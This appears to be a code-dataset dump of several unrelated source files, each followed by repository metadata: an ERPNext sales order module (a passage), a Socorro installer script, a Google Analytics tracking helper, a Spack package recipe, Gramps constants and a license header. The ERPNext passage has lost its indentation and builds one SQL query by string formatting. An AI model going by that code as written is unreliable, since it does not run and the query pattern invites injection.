res = frappe.db.sql("""select name from `tabProject` where name = %s
and (customer = %s or ifnull(customer,'')='')""",
(self.project_name, self.customer))
if not res:
frappe.throw(_("Customer {0} does not belong to project {1}").format(self.customer, self.project_name))
def validate(self):
super(SalesOrder, self).validate()
self.validate_order_type()
self.validate_delivery_date()
self.validate_mandatory()
self.validate_proj_cust()
self.validate_po()
self.validate_uom_is_integer("stock_uom", "qty")
self.validate_for_items()
self.validate_warehouse()
from erpnext.stock.doctype.packed_item.packed_item import make_packing_list
make_packing_list(self,'sales_order_details')
self.validate_with_previous_doc()
if not self.status:
self.status = "Draft"
from erpnext.utilities import validate_status
validate_status(self.status, ["Draft", "Submitted", "Stopped",
"Cancelled"])
if not self.billing_status: self.billing_status = 'Not Billed'
if not self.delivery_status: self.delivery_status = 'Not Delivered'
def validate_warehouse(self):
from erpnext.stock.utils import validate_warehouse_company
warehouses = list(set([d.warehouse for d in
self.get(self.fname) if d.warehouse]))
for w in warehouses:
validate_warehouse_company(w, self.company)
def validate_with_previous_doc(self):
super(SalesOrder, self).validate_with_previous_doc(self.tname, {
"Quotation": {
"ref_dn_field": "prevdoc_docname",
"compare_fields": [["company", "="], ["currency", "="]]
}
})
def update_enquiry_status(self, prevdoc, flag):
enq = frappe.db.sql("select t2.prevdoc_docname from `tabQuotation` t1, `tabQuotation Item` t2 where t2.parent = t1.name and t1.name=%s", prevdoc)
if enq:
frappe.db.sql("update `tabOpportunity` set status = %s where name=%s",(flag,enq[0][0]))
def update_prevdoc_status(self, flag):
for quotation in list(set([d.prevdoc_docname for d in self.get(self.fname)])):
if quotation:
doc = frappe.get_doc("Quotation", quotation)
if doc.docstatus==2:
frappe.throw(_("Quotation {0} is cancelled").format(quotation))
doc.set_status(update=True)
def on_submit(self):
super(SalesOrder, self).on_submit()
self.update_stock_ledger(update_stock = 1)
self.check_credit(self.grand_total)
frappe.get_doc('Authorization Control').validate_approving_authority(self.doctype, self.grand_total, self)
self.update_prevdoc_status('submit')
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
# Cannot cancel stopped SO
if self.status == 'Stopped':
frappe.throw(_("Stopped order cannot be cancelled. Unstop to cancel."))
self.check_nextdoc_docstatus()
self.update_stock_ledger(update_stock = -1)
self.update_prevdoc_status('cancel')
frappe.db.set(self, 'status', 'Cancelled')
def check_nextdoc_docstatus(self):
# Checks Delivery Note
submit_dn = frappe.db.sql_list("""select t1.name from `tabDelivery Note` t1,`tabDelivery Note Item` t2
where t1.name = t2.parent and t2.against_sales_order = %s and t1.docstatus = 1""", self.name)
if submit_dn:
frappe.throw(_("Delivery Notes {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_dn)))
# Checks Sales Invoice
submit_rv = frappe.db.sql_list("""select t1.name
from `tabSales Invoice` t1,`tabSales Invoice Item` t2
where t1.name = t2.parent and t2.sales_order = %s and t1.docstatus = 1""",
self.name)
if submit_rv:
frappe.throw(_("Sales Invoice {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_rv)))
#check maintenance schedule
submit_ms = frappe.db.sql_list("""select t1.name from `tabMaintenance Schedule` t1,
`tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.prevdoc_docname = %s and t1.docstatus = 1""", self.name)
if submit_ms:
frappe.throw(_("Maintenance Schedule {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_ms)))
# check maintenance visit
submit_mv = frappe.db.sql_list("""select t1.name from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname = %s and t1.docstatus = 1""",self.name)
if submit_mv:
frappe.throw(_("Maintenance Visit {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_mv)))
# check production order
pro_order = frappe.db.sql_list("""select name from `tabProduction Order`
where sales_order = %s and docstatus = 1""", self.name)
if pro_order:
frappe.throw(_("Production Order {0} must be cancelled before cancelling this Sales Order").format(comma_and(pro_order)))
def check_modified_date(self):
mod_db = frappe.db.get_value("Sales Order", self.name, "modified")
date_diff = frappe.db.sql("select TIMEDIFF('%s', '%s')" %
( mod_db, cstr(self.modified)))
if date_diff and date_diff[0][0]:
frappe.throw(_("{0} {1} has been modified. Please refresh.").format(self.doctype, self.name))
def stop_sales_order(self):
self.check_modified_date()
self.update_stock_ledger(-1)
frappe.db.set(self, 'status', 'Stopped')
frappe.msgprint(_("{0} {1} status is Stopped").format(self.doctype, self.name))
def unstop_sales_order(self):
self.check_modified_date()
self.update_stock_ledger(1)
frappe.db.set(self, 'status', 'Submitted')
frappe.msgprint(_("{0} {1} status is Unstopped").format(self.doctype, self.name))
def update_stock_ledger(self, update_stock):
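        # update_stock acts as a sign: +1 (submit/unstop) reserves qty in the
        # Bin, -1 (cancel/stop) releases it; see the callers above.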
from erpnext.stock.utils import update_bin
for d in self.get_item_list():
if frappe.db.get_value("Item", d['item_code'], "is_stock_item") == "Yes":
args = {
"item_code": d['item_code'],
"warehouse": d['reserved_warehouse'],
"reserved_qty": flt(update_stock) * flt(d['reserved_qty']),
"posting_date": self.transaction_date,
"voucher_type": self.doctype,
"voucher_no": self.name,
"is_amended": self.amended_from and 'Yes' or 'No'
}
update_bin(args)
def on_update(self):
pass
def get_portal_page(self):
return "order" if self.docstatus==1 else None
def get_rm_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
rm_total_price=frappe.db.get_value("Raw Material Cost Sheet",item.raw_material_costing,'rm_total_price')
spec=frappe.db.get_value("Raw Material Costing Details",{"parent":item.raw_material_costing},'spec')
spec_type=frappe.db.get_value("Raw Material Costing Details",{"parent":item.raw_material_costing},'type')
item.rm_total_price=rm_total_price
item.spec=cstr(spec)+' '+cstr(spec_type)
if rm_total_price:
self.set_rate()
return "Done"
def get_pp_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
pp_total_price=frappe.db.get_value("Primary Process Costing",item.primary_process_costing,'pp_total')
item.pp_total_price=pp_total_price
if pp_total_price:
self.set_rate()
return "Done"
def get_sm_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
sm_total_price=frappe.db.get_value("Sub Machining Costing",item.sub_machining_costing,'sm_total')
item.sm_total_price=sm_total_price
if sm_total_price:
self.set_rate()
return "Done"
def get_sp_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
sp_total_price=frappe.db.get_value("Secondary Process Costing",item.secondary_process_costing,'sp_total')
item.sp_total_price=sp_total_price
if sp_total_price:
self.set_rate()
return "Done"
def set_rate(self):
for item in self.get('sales_order_details'):
item.rate=flt(item.rm_total_price)+flt(item.pp_total_price)+flt(item.sm_total_price)+flt(item.sp_total_price)
return "done"
def get_batch_no_turnkey(self,idx):
for item in self.get('sales_order_details'):
if item.idx==idx:
if item.b_ref:
item.batch_no=item.b_ref
else:
value=frappe.db.get_value('Selling Settings','','turnkey_batch_no')
if value:
batch=self.get_batch_no_t(value)
item.batch_no=batch
item.b_ref=batch
frappe.db.set_value('Selling Settings','','turnkey_batch_no',batch)
return "Done"
def get_batch_no_t(self,value):
import re
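        # Bump the last run of digits, preserving zero padding, e.g.
        # 'TKB-0009' -> 'TKB-0010' and 'BATCH-199' -> 'BATCH-200'
        # (values illustrative; the stored turnkey_batch_no supplies the format)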
batch_no=re.sub(r'\d+(?=[^\d]*$)', lambda m: str(int(m.group())+1).zfill(len(m.group())), value)
return batch_no
def create_job_order(self):
for item in self.get('sales_order_details'):
name_series=self.get_name_series()
if item.job_order:
name=item.job_order
#part_no=item.part_number
else:
name=self.get_job_order(item,name_series)
item.job_order=name
#part_no=item.part_number
self.save(ignore_permissions=True)
self.append_values(name,item.raw_material_costing,"Raw Material Costing Details","Raw Material Cost Sheet","raw_material_costing_details","raw_material_costing","Raw Material Costing",item)
self.append_values(name,item.primary_process_costing,"Primary Process Details","Primary Process Costing","primary_process","primary_process_costing","Primary Process Costing",item)
self.append_values(name,item.secondary_process_costing,"Secondary Process Details","Secondary Process Costing","secondary_process","secondary_process_costing","Secondary Process Costing",item)
self.append_values(name,item.sub_machining_costing,"Sub Machining Details","Sub Machining Costing","sub_machining","sub_machining_costing","Sub Machining Costing",item)
return "Done"
def get_name_series(self):
if self.name:
name=self.name.split("-")
jo_name='JOB-'+name[1]+'-'+cstr(cint(self.id_value)+1)
self.id_value=cint(self.id_value)+1
self.save(ignore_permissions=True)
return jo_name
def get_job_order(self,item,series):
mat_type=item.material_type or ""
if not item.material_type and item.raw_material_costing:
rmc=frappe.get_doc("Raw Material Cost Sheet",item.raw_material_costing).raw_material_costing_details
for d in rmc:
if d.idx==1:
mat_type=cstr(d.spec)+" "+cstr(d.type)
jo=frappe.new_doc("Job Order")
if series:
jo.name=series
jo.customer_code=self.customer
jo.part_name=item.item_name
jo.part_no=item.part_number
jo.drawing_no=item.item_code
jo.qty=item.qty
jo.batch_no=item.batch_no
jo.sales_order=self.name
jo.po_no=self.po_no
jo.start_date=self.from_date
jo.delivery_date=self.delivery_date
jo.material_type=mat_type
jo.save(ignore_permissions=True)
jo.job_order=jo.name
jo.save(ignore_permissions=True)
return jo.name
def append_values(self,jo_name,co_name,co_c_name,co_p_doc,co_c_field,jo_c_field,jo_c_name,item):
if co_name:
jo_obj=frappe.get_doc("Job Order",jo_name)
co=self.get_co_details(co_name,co_c_name,co_p_doc,co_c_field)
jo=self.set_jo_childs(co,jo_obj,jo_c_field,item)
def get_co_details(self,co_name,co_c_name,co_p_doc,co_c_field):
co_c_list=frappe.get_doc(co_p_doc,co_name).get(co_c_field)
return co_c_list
def set_jo_childs(self,co,jo_obj,field,item):
for c in co:
c_obj=jo_obj.append(field,{})
c_obj.type=c.type
c_obj.vendor=c.vendor
c_obj.currency=c.currency
c_obj.mark_percent=c.mark_percent
c_obj.price_with_markup=c.price_with_markup
c_obj.quote_ref=c.quote_ref
c_obj.exchange_rate=c.exchange_rate
if field =='raw_material_costing':
c_obj.spec=c.spec
c_obj.unit_cost=c.unit_cost
c_obj.price=c.price
c_obj.od=c.od
c_obj.od_uom=c.od_uom
c_obj.id=c.id
c_obj.id_uom=c.id_uom
c_obj.lg=c.lg
c_obj.lg_uom=c.lg_uom
c_obj.raw_material_costing=item.raw_material_costing
elif field == "primary_process_costing":
c_obj.spec=c.spec
c_obj.unit_cost=c.unit_cost
c_obj.primary_process_costing=item.primary_process_costing
elif field =='secondary_process_costing':
c_obj.spec=c.spec
c_obj.unit_cost=c.unit_cost
c_obj.secondary_process_costing=item.secondary_process_costing
elif field =="sub_machining_costing":
c_obj.price=c.price
c_obj.sub_machining_costing=item.sub_machining_costing
jo_obj.save(ignore_permissions=True)
@frappe.whitelist()
def make_material_request(source_name, target_doc=None):
def postprocess(source, doc):
doc.material_request_type = "Purchase"
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Material Request",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Material Request Item",
"field_map": {
"parent": "sales_order_no",
"stock_uom": "uom"
}
}
}, target_doc, postprocess)
return doc
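# Note (sketch, not part of the original file): in get_mapped_doc the outer
# keys name source doctypes, "doctype" gives the target doctype, "field_map"
# renames source fields to target fields, "validation" gates on source field
# values, "condition" filters child rows, and "postprocess" runs after
# mapping. The same conventions apply to the mappers below.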
@frappe.whitelist()
def make_delivery_note(source_name, target_doc=None):
def set_missing_values(source, target):
target.ignore_pricing_rule = 1
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
def update_item(source, target, source_parent):
target.base_amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.base_rate)
target.amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.rate)
target.qty = flt(source.qty) - flt(source.delivered_qty)
target_doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Delivery Note",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Delivery Note Item",
"field_map": {
"rate": "rate",
"name": "prevdoc_detail_docname",
"parent": "against_sales_order",
},
"postprocess": update_item,
"condition": lambda doc: doc.delivered_qty < doc.qty
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, set_missing_values)
return target_doc
@frappe.whitelist()
def make_sales_invoice(source_name, target_doc=None):
def postprocess(source, target):
set_missing_values(source, target)
#Get the advance paid Journal Vouchers in Sales Invoice Advance
target.get_advances()
def set_missing_values(source, target):
target.is_pos = 0
target.ignore_pricing_rule = 1
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
def update_item(source, target, source_parent):
target.amount = flt(source.amount) - flt(source.billed_amt)
target.base_amount = target.amount * flt(source_parent.conversion_rate)
target.qty = source.rate and target.amount / flt(source.rate) or source.qty
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Sales Invoice",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Sales Invoice Item",
"field_map": {
"name": "so_detail",
"parent": "sales_order",
},
"postprocess": update_item,
"condition": lambda doc: doc.base_amount==0 or doc.billed_amt < doc.amount
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, postprocess)
def set_advance_vouchers(source, target):
# NOTE: this helper is never called; the query below is an incomplete
# fragment ({amount_query} is never substituted and there is no WHERE
# clause), so it is kept only as dead code.
advance_voucher_list = []
advance_voucher = frappe.db.sql("""
select
t1.name as voucher_no, t1.posting_date, t1.remark, t2.account,
t2.name as voucher_detail_no, {amount_query} as payment_amount, t2.is_advance
from
`tabJournal Voucher` t1, `tabJournal Voucher Detail` t2
""")
return doclist
@frappe.whitelist()
def make_maintenance_schedule(source_name, target_doc=None):
maint_schedule = frappe.db.sql("""select t1.name
from `tabMaintenance Schedule` t1, `tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.prevdoc_docname=%s and t1.docstatus=1""", source_name)
if not maint_schedule:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Schedule",
"field_map": {
"name": "sales_order_no"
},
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Schedule Item",
"field_map": {
"parent": "prevdoc_docname"
},
"add_if_empty": True
}
}, target_doc)
return doclist
@frappe.whitelist()
def make_maintenance_visit(source_name, target_doc=None):
visit = frappe.db.sql("""select t1.name
from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname=%s
and t1.docstatus=1 and t1.completion_status='Fully Completed'""", source_name)
if not visit:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Visit",
"field_map": {
"name": "sales_order_no"
},
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Visit Purpose",
"field_map": {
"parent": "prevdoc_docname",
"parenttype": "prevdoc_doctype"
},
"add_if_empty": True
}
}, target_doc)
return doclist
|
indictranstech/focal-erpnext
|
selling/doctype/sales_order/sales_order.py
|
Python
|
agpl-3.0
| 20,315
|
[
"VisIt"
] |
7b3ef017ee92f0865b76a7ab44cacc523f5da7e5c85c5109c8f73429911f7a6a
|
#!/usr/bin/env python
import functools
import getpass
import sys
import subprocess
import urllib2
import json
import os
import re
import webbrowser
import zipfile
import threading
import time
from contextlib import contextmanager
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = "\033[1m"
class InstallationError(Exception):
pass
@contextmanager
def pushd(dir):
old_dir = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(old_dir)
def can_import(name):
try:
__import__(name)
except ImportError:
return False
else:
return True
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
STEPS = []
def step(msg):
def _decorator(f):
@functools.wraps(f)
def _wrapper(ctx):
i = STEPS.index(_wrapper)
print("\n" + BOLD + "STEP {0}".format(i + 1) + ENDC + "\n" + msg +
"\n")
if ctx["_step_num"] >= i:
print("... already done!")
else:
f(ctx)
ctx["_step_num"] = i
STEPS.append(_wrapper)
return _wrapper
return _decorator
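# Illustrative sketch (not part of the original file): how the @step registry
# above gives resumable installs. Each wrapper knows its index in STEPS and
# skips itself once ctx["_step_num"] records that it already ran:
#
#   @step("Saying hello...")
#   def hello(ctx):
#       print("hello")
#
#   ctx = {"_step_num": -1}
#   for s in STEPS:
#       s(ctx)   # re-running this loop skips steps that already completed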
def status(s):
sys.stdout.write(" " + s + " ")
sys.stdout.flush()
def ok():
print(OKGREEN + "OK" + ENDC)
def fail():
print(FAIL + "FAILED" + ENDC)
def check_prerequisites(preds):
vals = {}
for name, pred in preds:
status("{0}:".format(name))
if pred():
ok()
vals[name] = True
else:
fail()
vals[name] = False
return vals
@step("Checking for prerequisites...")
def step1(ctx):
reqs = check_prerequisites([
("python >= 2.6", lambda: sys.version_info >= (2, 6)),
("virtualenv", functools.partial(cmd_exists, "virtualenv")),
("svn", functools.partial(cmd_exists, "svn")),
("rsync", functools.partial(cmd_exists, "rsync")),
("git", functools.partial(cmd_exists, "git")),
("hg", functools.partial(cmd_exists, "hg"))
])
if not all(reqs.itervalues()):
raise InstallationError("""\
Missing prerequisites.
Please ensure you have all of the above prerequisites installed.
""")
@step("Fetching Socorro...")
def step2(ctx):
ctx["dir"] = raw_input(" Specify a directory to install Socorro in [~/socorro]: ") or \
os.path.expanduser("~/socorro")
while not os.path.exists(ctx["dir"]):
if (raw_input(" Destination path does not exist, create it? [Y/n]: ") or \
"y").lower() == "y":
print("")
status("Creating installation directory...")
try:
os.makedirs(ctx["dir"])
except Exception as e:
fail()
raise InstallationError(e)
ok()
else:
fail()
tags = json.load(urllib2.urlopen("https://api.github.com/repos/mozilla/socorro/tags"))
tag_numbers = []
for i, tag in enumerate(tags):
try:
tag_numbers.append((tuple(map(int, tag["name"].lstrip("v").split("."))), tag["name"]))
except ValueError:
pass
tag_numbers.sort()
_, latest_release_tag = tag_numbers[-1]
status("Downloading Socorro {0}...".format(latest_release_tag))
print("")
if subprocess.call(["git", "clone", "--branch", latest_release_tag,
"--depth", "1", "https://github.com/mozilla/socorro",
ctx["dir"]]) != 0:
raise InstallationError("""\
Git error.
""")
@step("Installing minidump_stackwalk...")
def step3(ctx):
with pushd(ctx["dir"]):
if subprocess.call(["make", "minidump_stackwalk"]) != 0:
raise InstallationError("""\
Could not install minidump_stackwalk.
Please check out the console output for error details.
""")
@step("Updating submodules...")
def step4(ctx):
with pushd(ctx["dir"]):
if subprocess.call(["git", "submodule", "init"]) != 0 or \
subprocess.call(["git", "submodule", "update"]) != 0:
raise InstallationError("""\
Could not update submodules.
Please check out the console output for error details.
""")
@step("Bootstrapping Socorro environment...")
def step5(ctx):
with pushd(ctx["dir"]):
if subprocess.call(["make", "bootstrap"]) != 0:
raise InstallationError("""\
Could not bootstrap.
Please check out the console output for error details.
""")
def load_socorro_virtualenv(ctx):
execfile(os.path.join(ctx["dir"], "socorro-virtualenv", "bin",
"activate_this.py"), {
"__file__": os.path.join(ctx["dir"], "socorro-virtualenv", "bin",
"activate_this.py")
})
@step("Checking for PostgreSQL...")
def step6(ctx):
ctx["host"] = raw_input(" PostgreSQL host [localhost]: ") or \
"localhost"
ctx["database"] = raw_input(" PostgreSQL database [breakpad]: ") or \
"breakpad"
default_username = getpass.getuser()
ctx["username"] = raw_input(" PostgreSQL username [{0}]: ".format(default_username)) or \
default_username
ctx["password"] = getpass.getpass(" PostgreSQL password (will not be echoed): ")
print("")
load_socorro_virtualenv(ctx)
import psycopg2
status("Connecting to PostgreSQL server...")
try:
conn = psycopg2.connect(database=ctx["database"], user=ctx["username"],
password=ctx["password"], host=ctx["host"])
except Exception as e:
fail()
raise InstallationError(e)
conn.close()
ok()
@step("Checking for PostgreSQL requirements...")
def step7(ctx):
load_socorro_virtualenv(ctx)
import psycopg2
conn = psycopg2.connect(database=ctx["database"], user=ctx["username"],
password=ctx["password"], host=ctx["host"])
cur = conn.cursor()
cur.execute("SHOW TIMEZONE")
tz, = cur.fetchone()
status("Checking if time zone is UTC...")
if tz != "UTC":
fail()
raise InstallationError("""\
PostgreSQL time zone is not UTC.
Please edit your postgresql.conf file and set:
timezone = 'UTC'
""")
ok()
status("Checking if JSON enhancements are available...")
cur.execute("SELECT version()")
version_number = re.match(r"^PostgreSQL (\d+)\.(\d+).*", cur.fetchone()[0])
# convert to ints so the (9, 3) comparison below compares numbers, not strings
version_number = int(version_number.group(1)), int(version_number.group(2))
# NOTE: Socorro doesn't work on PostgreSQL 9.3 yet.
if version_number < (9, 3):
cur.execute("SELECT * FROM pg_available_extensions WHERE name='json_enhancements'")
if cur.fetchone() is None:
fail()
raise InstallationError("""\
PostgreSQL JSON enhancements are not available.
Please run, in your Socorro checkout:
make json_enhancements_pg_extension
""")
conn.close()
ok()
@step("Setting up PostgreSQL database...")
def step8(ctx):
load_socorro_virtualenv(ctx)
try:
os.rename(os.path.join(ctx["dir"], "config", "alembic.ini-dist"),
os.path.join(ctx["dir"], "config", "alembic.ini"))
except OSError:
pass
with pushd(ctx["dir"]):
if subprocess.call(["python",
"-m",
"socorro.external.postgresql.setupdb_app",
"--dropdb",
"--database_name", ctx["database"],
"--database_superusername", ctx["username"],
"--database_superuserpassword", ctx["password"],
"--database_hostname", ctx["host"]]) != 0:
raise InstallationError("""\
Could not run setupdb_app.
Please check out the console output for error details.
""")
import psycopg2
conn = psycopg2.connect(database=ctx["database"], user=ctx["username"],
password=ctx["password"], host=ctx["host"])
status("Setting up roles...")
cur = conn.cursor()
with open(os.path.join(ctx["dir"], "sql", "roles.sql")) as f:
# executemany() with an empty parameter list executes nothing; run the
# script once and commit it
cur.execute(f.read())
conn.commit()
conn.close()
ok()
@step("Installing configurator dependencies...")
def step9(ctx):
load_socorro_virtualenv(ctx)
if subprocess.call(["pip", "install", "-r", "requirements.txt"]) != 0:
raise InstallationError("""\
Could not install configurator dependencies.
Please check out the console output for error details.
""")
@step("Configuring Socorro...")
def step10(ctx):
load_socorro_virtualenv(ctx)
zf = zipfile.ZipFile("config.zip", "w")
for root, dirs, files in os.walk("config"):
for fn in files:
path = os.path.join(root, fn)
with open(path, "r") as f:
zf.writestr(os.path.relpath(path, "config"),
f.read()
.replace("{{DATABASE_NAME}}", ctx["database"])
.replace("{{DATABASE_HOST}}", ctx["host"])
.replace("{{DATABASE_USER}}", ctx["username"])
.replace("{{DATABASE_PASSWORD}}", ctx["password"]))
zf.close()
sys.path.insert(0, ctx["dir"])
os.environ["SOCORRO_PATH"] = os.path.join(ctx["dir"], "socorro")
# XXX: socorromatic does analysis on import, which is kind of disgusting
from socorromatic import app
class ServerThread(threading.Thread):
daemon = True
def run(self):
app.run(debug=True, use_reloader=False)
ServerThread().start()
time.sleep(1)
webbrowser.open("http://localhost:5000")
raw_input("Press enter when configuration is complete...")
status("Requesting for configurator to shut down...")
req = urllib2.Request("http://localhost:5000/_shutdown", "")
urllib2.urlopen(req).read()
ok()
zf = zipfile.ZipFile("config.zip", "r")
config_dir = os.path.join(ctx["dir"], "config")
status("Extracting configuration files to {0}...".format(config_dir))
zf.extractall(config_dir)
zf.close()
ok()
def _main():
print("""\
""" + BOLD + "SOCORROMATIC" + ENDC + """
Welcome to the Socorro installer. This script will guide you through the steps
of installing Socorro on this node. \
""")
if os.path.exists("socorromatic-state.json"):
with open("socorromatic-state.json", "r") as f:
ctx = json.load(f)
else:
ctx = {
"_step_num": -1
}
try:
for step in STEPS:
step(ctx)
except InstallationError as e:
print("\nInstallation was aborted due to a fatal error:\n\n {0}".format(e))
sys.exit(1)
finally:
with open("socorromatic-state.json", "w") as f:
json.dump(ctx, f)
print("\nInstallation finished!")
if (raw_input("Would you like to delete the installer state file? [Y/n]: ") or "y").lower() == "y":
os.unlink("socorromatic-state.json")
print("""
Socorro has been successfully installed to: {0}
For further information on the installation process, as well as running
your new Socorro cluster, please visit:
http://socorro.readthedocs.org/en/latest/installation.html
""".format(ctx["dir"]))
if __name__ == "__main__":
_main()
|
rfw/socorromatic
|
installer.py
|
Python
|
mpl-2.0
| 11,431
|
[
"VisIt"
] |
4767f50a65c110589356d37162a32ebb89c9ed3b398fe16c048bda14bb775051
|
from typing import Optional
from backend.common.run_after_response import run_after_response
class GoogleAnalytics:
"""
Class that manages sending information to Google Analytics
For more information about GAnalytics Protocol Parameters, visit
https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters
"""
@classmethod
def track_event(
cls,
client_id: str,
event_category: str,
event_action: str,
event_label: Optional[str] = None,
event_value: Optional[int] = None,
run_after: bool = False,
) -> None:
from backend.common.sitevars.google_analytics_id import GoogleAnalyticsID
google_analytics_id = GoogleAnalyticsID.google_analytics_id()
if not google_analytics_id:
import logging
logging.warning(
"Missing sitevar: google_analytics.id. Can't track API usage."
)
return
import uuid
cid = uuid.uuid3(uuid.NAMESPACE_X500, str(client_id))
params = {
"v": 1,
"tid": google_analytics_id,
"cid": str(cid),
"t": "event",
"ec": event_category,
"ea": event_action,
"cd1": client_id, # custom dimension 1 is the raw client ID
"ni": 1,
"sc": "end", # forces tracking session to end
}
if event_label:
params["el"] = event_label
if event_value:
params["ev"] = event_value
def make_request():
import requests
requests.get(
"https://www.google-analytics.com/collect", params=params, timeout=10
)
if run_after:
run_after_response(make_request)
else:
make_request()
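# Illustrative sketch (not part of the original file): a typical call site,
# assuming an API key string as the client id ("some-api-key" is made up).
#
# GoogleAnalytics.track_event(
#     "some-api-key",              # hashed into a stable GA client id
#     event_category="api-v3",
#     event_action="/team/frc254",
#     run_after=True,              # defer the HTTP call until after the response
# )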
|
the-blue-alliance/the-blue-alliance
|
src/backend/common/google_analytics.py
|
Python
|
mit
| 1,848
|
[
"VisIt"
] |
c099e68b2fc25acbcef668ac008e768f380b97cd557103f0a225a330a5a03eea
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RSpem(RPackage):
"""This package can optimize the parameter in S-system models given time
series data"""
homepage = "https://bioconductor.org/packages/SPEM/"
git = "https://git.bioconductor.org/packages/SPEM.git"
version('1.18.0', commit='3ab425dd9889885eac328d26b73366a875cd250b')
depends_on('r-rsolnp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
depends_on('r@3.4.3:3.4.9', when='@1.18.0')
|
mfherbst/spack
|
var/spack/repos/builtin/packages/r-spem/package.py
|
Python
|
lgpl-2.1
| 1,722
|
[
"Bioconductor"
] |
409ea052fd0be0a581c2f530f462629d63be0ea9014331e9cf3278b7e985fccd
|
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2009 Brian G. Matherly
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Public Constants
#
#------------------------------------------------------------------------
GRAMPS_XML_VERSION_TUPLE = (1, 7, 1) # version for Gramps 4.2
GRAMPS_XML_VERSION = '.'.join(str(i) for i in GRAMPS_XML_VERSION_TUPLE)
|
SNoiraud/gramps
|
gramps/plugins/lib/libgrampsxml.py
|
Python
|
gpl-2.0
| 1,447
|
[
"Brian"
] |
7551143b5d685c57d9839c3ff81193ed92060fce2aa9816db7b0076abab9cccd
|
# -*- coding: utf-8 -*-
"""
For information and usage see README, or http://pypi.python.org/pypi/numericalunits
"""
#Copyright (C) 2012 Steven Byrnes
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
